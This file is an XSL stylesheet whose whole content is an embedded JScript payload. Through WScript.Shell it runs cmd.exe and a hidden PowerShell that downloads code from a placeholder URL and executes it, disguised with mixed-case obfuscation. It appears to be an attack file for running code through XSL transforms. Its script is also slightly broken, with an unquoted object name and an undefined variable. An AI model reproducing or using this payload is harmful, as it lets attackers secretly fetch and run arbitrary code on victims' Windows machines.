<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
    <ms:script implements-prefix="user" language="JScript">
    <![CDATA[
    var a=WsCRIpT.sHElL;var b = neW AcTiVeXObjEcT($a).Run("cMd.exE /c pOWersHElL irm https://ssssss|pOWersHElL -nOLoGo -WiNdOwSTyle HiDDen -NoEXIt -NoPROfIlE -NonInteractive",0,false);
    ]]> </ms:script>
</stylesheet>
